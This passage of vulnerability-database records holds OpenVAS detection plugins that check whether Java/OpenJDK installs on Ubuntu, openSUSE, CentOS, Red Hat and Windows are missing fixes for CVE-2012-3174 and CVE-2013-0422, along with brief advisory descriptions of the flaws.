"modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310841283", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310841283", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1693_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for openjdk-7 USN-1693-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1693-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.841283\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-21 09:50:59 +0530 (Mon, 21 Jan 2013)\");\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"USN\", value:\"1693-1\");\n script_name(\"Ubuntu Update for openjdk-7 USN-1693-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openjdk-7'\n package(s) announced via the 
referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.10\");\n script_tag(name:\"affected\", value:\"openjdk-7 on Ubuntu 12.10\");\n script_tag(name:\"insight\", value:\"It was discovered that OpenJDK 7's security mechanism could be bypassed via\n Java applets. If a user were tricked into opening a malicious website, a\n remote attacker could exploit this to perform arbitrary code execution as\n the user invoking the program.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"icedtea-7-jre-cacao\", ver:\"7u9-2.3.4-0ubuntu1.12.10.1\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"icedtea-7-jre-jamvm\", ver:\"7u9-2.3.4-0ubuntu1.12.10.1\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-7-jre\", ver:\"7u9-2.3.4-0ubuntu1.12.10.1\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-7-jre-headless\", ver:\"7u9-2.3.4-0ubuntu1.12.10.1\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-7-jre-lib\", ver:\"7u9-2.3.4-0ubuntu1.12.10.1\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isdpkgvuln(pkg:\"openjdk-7-jre-zero\", ver:\"7u9-2.3.4-0ubuntu1.12.10.1\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:41:01", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-03-11T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for java-1_7_0-openjdk (openSUSE-SU-2013:0199-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850427", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850427", "sourceData": "# Copyright (C) 2013 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2013-01/msg00025.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.850427\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-03-11 18:29:19 +0530 (Mon, 11 Mar 2013)\");\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"openSUSE-SU\", value:\"2013:0199-1\");\n script_name(\"openSUSE: Security Advisory for java-1_7_0-openjdk (openSUSE-SU-2013:0199-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java-1_7_0-openjdk'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE12\\.2\");\n\n script_tag(name:\"affected\", value:\"java-1_7_0-openjdk on openSUSE 12.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"insight\", value:\"java-1_7_0-openjdk was updated to icedtea-2.3.4 fixing bugs\n and also severe security issues:\n\n * Security fixes\n\n - S8004933, CVE-2012-3174: Improve MethodHandle\n interaction with libraries\n\n - S8006017, CVE-2013-0422: Improve lookup resolutions\n\n - S8006125: Update 
MethodHandles library interactions\n\n * Bug fixes\n\n - S7197906: BlockOffsetArray::power_to_cards_back() needs\n to handle > 32 bit shifts\n\n - G422525: Fix building with PaX enabled kernels.\n\n - use gpg-offline to check the validity of icedtea tarball\n\n - use jamvm on %arm\n\n - use icedtea package name instead of protected openjdk for\n jamvm builds\n\n - fix armv5 build\n\n - update to java access bridge 1.26.2\n\n * bugfix release, mainly 64bit JNI and JVM support\n\n - fix a segfault in AWT code - (bnc#792951)\n\n * add openjdk-7-src-b147-awt-crasher.patch\n\n - turn pulseaudio off on pre 11.4 distros\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE12.2\") {\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk\", rpm:\"java-1_7_0-openjdk~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-debuginfo\", rpm:\"java-1_7_0-openjdk-debuginfo~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-debugsource\", rpm:\"java-1_7_0-openjdk-debugsource~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-demo\", rpm:\"java-1_7_0-openjdk-demo~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-demo-debuginfo\", rpm:\"java-1_7_0-openjdk-demo-debuginfo~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-devel\", 
rpm:\"java-1_7_0-openjdk-devel~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-devel-debuginfo\", rpm:\"java-1_7_0-openjdk-devel-debuginfo~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-javadoc\", rpm:\"java-1_7_0-openjdk-javadoc~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-src\", rpm:\"java-1_7_0-openjdk-src~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:11", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-01-21T00:00:00", "type": "openvas", "title": "CentOS Update for java CESA-2013:0165 centos5", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310881557", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881557", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for java CESA-2013:0165 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2013-January/019203.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881557\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-21 09:37:56 +0530 (Mon, 21 Jan 2013)\");\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2013:0165\");\n script_name(\"CentOS Update for java CESA-2013:0165 centos5\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"java on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"These packages provide the OpenJDK 7 Java Runtime Environment and the\n OpenJDK 7 Software Development Kit.\n\n Two improper permission check issues were discovered in the reflection API\n in OpenJDK. 
An untrusted Java application or applet could use these flaws\n to bypass Java sandbox restrictions. (CVE-2012-3174, CVE-2013-0422)\n\n This erratum also upgrades the OpenJDK package to IcedTea7 2.3.4. Refer to\n the NEWS file, linked to in the References, for further information.\n\n All users of java-1.7.0-openjdk are advised to upgrade to these updated\n packages, which resolve these issues. All running instances of OpenJDK Java\n must be restarted for the update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.4.el5_9.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-demo\", rpm:\"java-1.7.0-openjdk-demo~1.7.0.9~2.3.4.el5_9.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.9~2.3.4.el5_9.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-javadoc\", rpm:\"java-1.7.0-openjdk-javadoc~1.7.0.9~2.3.4.el5_9.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-src\", rpm:\"java-1.7.0-openjdk-src~1.7.0.9~2.3.4.el5_9.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:56", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-01-21T00:00:00", 
"type": "openvas", "title": "RedHat Update for java-1.7.0-openjdk RHSA-2013:0165-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310870889", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870889", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for java-1.7.0-openjdk RHSA-2013:0165-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2013-January/msg00036.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870889\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-21 09:36:09 +0530 (Mon, 21 Jan 2013)\");\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"RHSA\", value:\"2013:0165-01\");\n script_name(\"RedHat Update for java-1.7.0-openjdk RHSA-2013:0165-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java-1.7.0-openjdk'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_(6|5)\");\n script_tag(name:\"affected\", value:\"java-1.7.0-openjdk on Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 
6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"These packages provide the OpenJDK 7 Java Runtime Environment and the\n OpenJDK 7 Software Development Kit.\n\n Two improper permission check issues were discovered in the reflection API\n in OpenJDK. An untrusted Java application or applet could use these flaws\n to bypass Java sandbox restrictions. (CVE-2012-3174, CVE-2013-0422)\n\n This erratum also upgrades the OpenJDK package to IcedTea7 2.3.4. Refer to\n the NEWS file, linked to in the References, for further information.\n\n All users of java-1.7.0-openjdk are advised to upgrade to these updated\n packages, which resolve these issues. All running instances of OpenJDK Java\n must be restarted for the update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.4.1.el6_3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-debuginfo\", rpm:\"java-1.7.0-openjdk-debuginfo~1.7.0.9~2.3.4.1.el6_3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.9~2.3.4.1.el6_3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.4.el5_9.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"java-1.7.0-openjdk-debuginfo\", rpm:\"java-1.7.0-openjdk-debuginfo~1.7.0.9~2.3.4.el5_9.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-demo\", rpm:\"java-1.7.0-openjdk-demo~1.7.0.9~2.3.4.el5_9.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.9~2.3.4.el5_9.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-javadoc\", rpm:\"java-1.7.0-openjdk-javadoc~1.7.0.9~2.3.4.el5_9.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-src\", rpm:\"java-1.7.0-openjdk-src~1.7.0.9~2.3.4.el5_9.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-23T19:06:09", "description": "This host is installed with Oracle Java SE and is prone to multiple\n code execution vulnerabilities.", "cvss3": {}, "published": "2013-01-17T00:00:00", "type": "openvas", "title": "Oracle Java SE Multiple Remote Code Execution Vulnerabilities (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2020-04-21T00:00:00", "id": "OPENVAS:1361412562310803156", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803156", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle Java SE Multiple Remote Code Execution Vulnerabilities (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute 
it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803156\");\n script_version(\"2020-04-21T11:03:03+0000\");\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_bugtraq_id(57246, 57312);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-04-21 11:03:03 +0000 (Tue, 21 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-01-17 12:41:59 +0530 (Thu, 17 Jan 2013)\");\n script_name(\"Oracle Java SE Multiple Remote Code Execution Vulnerabilities (Windows)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/51820/\");\n script_xref(name:\"URL\", value:\"http://securitytracker.com/id?1027972\");\n script_xref(name:\"URL\", value:\"http://www.kb.cert.org/vuls/id/625617\");\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/java/javase/7u11-relnotes-1896856.html\");\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_java_prdts_detect_portable_win.nasl\");\n 
script_mandatory_keys(\"Sun/Java/JRE/Win/Ver\");\n script_tag(name:\"impact\", value:\"Successful exploitation allows remote attackers to execute arbitrary code\n via unspecified vectors.\");\n script_tag(name:\"affected\", value:\"Oracle Java version 7 before Update 11 on windows\");\n script_tag(name:\"solution\", value:\"Upgrade to Oracle Java 7 Update 11 or later.\");\n script_tag(name:\"summary\", value:\"This host is installed with Oracle Java SE and is prone to multiple\n code execution vulnerabilities.\");\n script_tag(name:\"insight\", value:\"- An error in Java Management Extensions (JMX) MBean components which allows\n remote attackers to execute arbitrary code via unspecified vectors.\n\n - An unspecified error exists within the Libraries subcomponent.\n\n NOTE: The vendor reports that only version 7.x is affected. However,\n some security researchers indicate that some 6.x versions may\n be affected\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\njreVer = get_kb_item(\"Sun/Java/JRE/Win/Ver\");\n\nif(jreVer)\n{\n if(version_in_range(version:jreVer, test_version:\"1.7\", test_version2:\"1.7.0.10\")){\n report = report_fixed_ver(installed_version:jreVer, vulnerable_range:\"1.7 - 1.7.0.10\");\n security_message(port: 0, data: report);\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-12-04T11:22:07", "description": "Check for the Version of openjdk-7", "cvss3": {}, "published": "2013-01-21T00:00:00", "type": "openvas", "title": "Ubuntu Update for openjdk-7 USN-1693-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2017-12-01T00:00:00", "id": "OPENVAS:841283", "href": "http://plugins.openvas.org/nasl.php?oid=841283", "sourceData": "###############################################################################\n# OpenVAS Vulnerability 
Test\n# $Id: gb_ubuntu_USN_1693_1.nasl 7958 2017-12-01 06:47:47Z santu $\n#\n# Ubuntu Update for openjdk-7 USN-1693-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"openjdk-7 on Ubuntu 12.10\";\ntag_insight = \"It was discovered that OpenJDK 7's security mechanism could be bypassed via\n Java applets. 
If a user were tricked into opening a malicious website, a\n remote attacker could exploit this to perform arbitrary code execution as\n the user invoking the program.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1693-1/\");\n script_id(841283);\n script_version(\"$Revision: 7958 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 07:47:47 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-21 09:50:59 +0530 (Mon, 21 Jan 2013)\");\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"1693-1\");\n script_name(\"Ubuntu Update for openjdk-7 USN-1693-1\");\n\n script_summary(\"Check for the Version of openjdk-7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU12.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"icedtea-7-jre-cacao\", ver:\"7u9-2.3.4-0ubuntu1.12.10.1\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"icedtea-7-jre-jamvm\", ver:\"7u9-2.3.4-0ubuntu1.12.10.1\", rls:\"UBUNTU12.10\")) != NULL)\n 
